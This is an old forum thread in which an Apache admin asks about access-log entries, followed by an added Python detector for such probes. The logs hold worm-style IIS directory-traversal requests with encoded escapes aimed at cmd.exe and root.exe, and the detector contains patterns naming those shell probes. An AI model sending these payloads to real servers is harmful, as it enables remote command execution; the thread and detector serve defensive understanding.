#1
Access log file.
I looked in my access log file and found this:

62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

Has anyone seen this before? I am using Apache server. I see that there are some files that have 404 (error), but 400, what does that mean? Could someone please lend a helping hand on this?

Thank You
Kevin

#2
RE: Access log file.
400 means bad request.
#3
RE: Access log file.
OK, what more information would you need? Maybe it was something I was doing on here; I have been working on getting MySQL to work right. Not sure why this is in the access log. Here is everything that is in the log:

62.220.119.12 - - [24/Feb/2004:02:19:05 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
62.220.119.12 - - [24/Feb/2004:02:19:06 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
62.220.119.12 - - [24/Feb/2004:02:19:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:15 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:20 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:22 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:23 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
62.220.119.12 - - [24/Feb/2004:02:19:25 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:30 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

As you can see by the times, all within minutes or seconds of each other.

#4
RE: Access log file.
Is this the access log or the error log? I see nothing but error messages in the file.
I picked two lines from the log:

Code:
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

The not found error comes because the requested file couldn't be found. But notice the difference in the GET request. 404 is produced with ..%25%35%63 and 400 comes when the request was %%35c (notice the two %-characters, although I'm not sure if those are the source of the error). The real source of the error might also be on the software that makes the GET request, in other words the browser. I'm no guru at HTTP, so I'll leave this for someone more experienced.

#5
RE: Access log file.
What that is - is Microsoft worms accessing your server to try and propagate.

#6
RE: Access log file.
Quote:
Is this the only IP? It's from a block from Tehran, Iran and, as noted, quite possibly a virus. I'd block the IP at your firewall and any others with similar log actions.
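
The 400 versus 404 difference raised in post #4, as an added example that is not part of the original thread: Apache answers a path containing an invalid percent-escape (a `%` not followed by two hex digits, as in `%%35c`) with 400, while a well-formed path that resolves to no file gets 404. The Python sketch below flags both kinds of probe in a common-format access log; the function names, finding labels and the one benign log line are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Sample input: four request lines copied from the log posted in this thread,
# plus one constructed benign line (192.0.2.10 is a documentation address).
SAMPLE_LOG = r'''
62.220.119.12 - - [24/Feb/2004:02:19:15 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
192.0.2.10 - - [24/Feb/2004:02:21:00 -0500] "GET /index.html HTTP/1.0" 200 1043
'''.strip().splitlines()

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
BAD_ESCAPE = re.compile(r'%(?![0-9A-Fa-f]{2})')     # '%' not followed by two hex digits
OVERLONG = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)  # 2-byte overlong UTF-8 (lead byte C0/C1)
TRAVERSAL = re.compile(r'\.\.[\\/]')                # ../ or ..\ after decoding
PROBE = re.compile(r'(cmd|root)\.exe', re.I)

def decode_fully(path, max_rounds=5):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    for rounds in range(max_rounds):
        nxt = unquote(path, encoding='latin-1')
        if nxt == path:
            return path, rounds
        path = nxt
    return path, max_rounds

def analyse(line):
    """Return (ip, status, findings) for one common-log-format line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path = target.split('?', 1)[0]
    decoded, rounds = decode_fully(path)
    checks = [
        ('malformed-escape', BAD_ESCAPE.search(path)),  # invalid URL syntax: expect 400
        ('multi-encoded', rounds > 1),                  # %255c -> %5c -> backslash
        ('overlong-utf8', OVERLONG.search(path)),
        ('traversal', TRAVERSAL.search(decoded)),
        ('shell-probe', PROBE.search(decoded)),
    ]
    return ip, int(status), [name for name, hit in checks if hit]

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(analyse(entry))
```
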